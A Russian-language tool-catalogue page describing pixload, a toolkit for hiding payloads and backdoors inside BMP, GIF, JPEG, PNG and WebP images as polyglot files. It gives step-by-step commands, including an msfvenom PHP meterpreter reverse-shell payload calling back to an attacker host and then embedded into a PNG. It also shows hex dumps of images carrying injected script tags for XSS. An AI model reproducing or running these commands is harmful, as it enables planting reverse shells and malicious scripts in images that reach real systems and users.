Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
pixload — Инструменты создания/внедрения полезной нагрузки в изображения | Kitploit
Инструменты/GitHubGitHub/sighook/pixload
Генерация полезной нагрузкиЭксплуатация веб-приложенийСтеганографияРазработка Полезной Нагрузки
GitHubsighook/pixload

pixload

Инструменты создания/внедрения полезной нагрузки в изображения

Репозиторий
1.3k252313 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

pixload -- Инструменты для создания полезной нагрузки в изображениях

ОПИСАНИЕ

Набор инструментов для сокрытия бэкдоров создания/внедрения полезной нагрузки в изображения.

В настоящее время поддерживаются следующие типы изображений: BMP, GIF, JPG, PNG, WebP.

о

Полезные ссылки для лучшего понимания pixload и вариантов его использования:

  • Обход CSP с помощью polyglot JPEGs

  • Хакерская группа использует Polyglot-изображения для сокрытия атак malvertising

  • Кодирование веб-шеллов в PNG IDAT chunks

  • XSS на Facebook через PNG и странные типы контента

  • Пересмотр XSS-пейлоадов в PNG IDAT chunks

Если вы хотите закодировать полезную нагрузку таким образом, чтобы результирующий двоичный блок был одновременно корректным x86 shellcode и корректным файлом изображения, рекомендую посмотреть здесь и здесь.

msfvenom

Если вы хотите внедрить метасплойт-пейлоад, нужно сделать следующее:

  1. Создать метасплойт-пейлоад (например, php).
$ msfvenom -p php/meterpreter_reverse_tcp \
	LHOST=192.168.0.1 LPORT=31337 -f raw 2>/dev/null > payload.php
  1. Отредактировать payload.php при необходимости.

  2. Внедрить payload.php в изображение (например, png).

$ pixload-png --payload "$(cat payload.php)" payload.png

УСТАНОВКА

Зависимости

Требуются следующие Perl-модули:

  • GD

  • Image::ExifTool

  • String::CRC32

В системах на Debian установите эти пакеты:

sudo apt install libgd-perl libimage-exiftool-perl libstring-crc32-perl

На FreeBSD и DragonFlyBSD установите эти пакеты:

doas pkg install p5-GD p5-Image-ExifTool p5-String-CRC32

На OSX обратитесь к этому обходному решению (спасибо @iosdec).

Сборка и установка
make install

Docker

docker build -t pixload .
docker run -v "$(pwd):/pixload" -it --rm pixload

ИНСТРУМЕНТЫ

pixload-bmp

Справка
$ pixload-bmp --help
Usage: pixload-bmp [OPTION]... FILE
Скрыть полезную нагрузку/вредоносный код в BMP-изображениях.

Обязательные аргументы для длинных опций обязательны и для коротких.
  -P, --payload STRING   задать полезную нагрузку для внедрения
  -v, --version          вывести версию и выйти
  -h, --help             вывести справку и выйти

Если выходной FILE уже существует, то полезная нагрузка будет внедрена в этот
существующий файл. В противном случае будет создан новый.
Пример
$ pixload-bmp payload.bmp
...... Создатель/Внедритель BMP-пейлоада ......
..........................................
... https://github.com/sighook/pixload ...
..........................................

[>] Генерация выходного файла
[✔] Файл сохранён: payload.bmp

[>] Внедрение полезной нагрузки в payload.bmp
[✔] Полезная нагрузка внедрена успешно

payload.bmp: PC bitmap, OS/2 1.x format, 1 x 1 x 24, cbSize 10799, bits offset 26

00000000  42 4d 2f 2a 00 00 00 00  00 00 1a 00 00 00 0c 00  |BM/*............|
00000010  00 00 01 00 01 00 01 00  18 00 00 00 ff 00 2a 2f  |..............*/|
00000020  3d 31 3b 3c 73 63 72 69  70 74 20 73 72 63 3d 2f  |=1;<script src=/|
00000030  2f 65 78 61 6d 70 6c 65  2e 63 6f 6d 3e 3c 2f 73  |/example.com></s|
00000040  63 72 69 70 74 3e 3b                              |cript>;|
00000047

Смотрите страницу руководства pixload-bmp(1) для получения дополнительной информации.

pixload-gif

Справка
$ pixload-gif --help
Usage: pixload-gif [OPTION]... FILE
Скрыть полезную нагрузку/вредоносный код в GIF-изображениях.

Обязательные аргументы для длинных опций обязательны и для коротких.
  -W, --pixelwidth  INTEGER   (не влияет)
                              задать ширину пикселя для нового изображения (по умолчанию: 10799)
  -H, --pixelheight INTEGER   задать высоту пикселя для нового изображения (по умолчанию: 32)
  -P, --payload     STRING    задать полезную нагрузку для внедрения
  -v, --version               вывести версию и выйти
  -h, --help                  вывести справку и выйти

Опция -W, --pixelwidth не влияет, поскольку pixload-gif перезаписывает
байты ширины пикселя символами "/*", чтобы подготовить polyglot gif-изображение.

Если выходной FILE уже существует, то полезная нагрузка будет внедрена в этот
существующий файл. В противном случае будет создан новый с указанной шириной
пикселей.
Пример
$ pixload-gif payload.gif
...... Создатель/Внедритель GIF-пейлоада ......
..........................................
... https://github.com/sighook/pixload ...
..........................................

[>] Генерация выходного файла
[✔] Файл сохранён: payload.gif

[>] Внедрение полезной нагрузки в payload.gif
[✔] Полезная нагрузка внедрена успешно

payload.gif: GIF image data, version 87a, 10799 x 32

00000000  47 49 46 38 37 61 2f 2a  20 00 80 00 00 04 02 04  |GIF87a/* .......|
00000010  00 00 00 2c 00 00 00 00  20 00 20 00 00 02 1e 84  |...,.... . .....|
00000020  8f a9 cb ed 0f a3 9c b4  da 8b b3 de bc fb 0f 86  |................|
00000030  e2 48 96 e6 89 a6 ea ca  b6 ee 0b 9b 05 00 3b 2a  |.H............;*|
00000040  2f 3d 31 3b 3c 73 63 72  69 70 74 20 73 72 63 3d  |/=1;<script src=|
00000050  2f 2f 65 78 61 6d 70 6c  65 2e 63 6f 6d 3e 3c 2f  |//example.com></|
00000060  73 63 72 69 70 74 3e 3b                           |script>;|
00000068

Смотрите страницу руководства pixload-gif(1) для получения дополнительной информации.

pixload-jpg

Справка
$ pixload-jpg --help
Usage: pixload-jpg [OPTION]... FILE
Скрыть полезную нагрузку/вредоносный код в JPEG-изображениях.

Обязательные аргументы для длинных опций обязательны и для коротких.
  -S, --section COM|DQT         задать раздел для внедрения полезной нагрузки
  -P, --payload STRING          задать полезную нагрузку для внедрения
  -v, --version                 вывести версию и выйти
  -h, --help                    вывести справку и выйти

Если выходной FILE уже существует, то полезная нагрузка будет внедрена в этот
существующий файл. В противном случае будет создан новый.
Примеры
  1. Внедрение полезной нагрузки в раздел комментариев:
$ pixload-jpg -S com payload.jpg
..... Создатель/Внедритель JPEG-пейлоада ......
..........................................
... https://github.com/sighook/pixload ...
..........................................

[>] Генерация выходного файла
[✔] Файл сохранён: payload.jpg

[>] Внедрение полезной нагрузки в COMMENT
[✔] Полезная нагрузка внедрена успешно

payload.jpg: JPEG image data, progressive, precision 8, 1x1, components 1
Скачать инструмент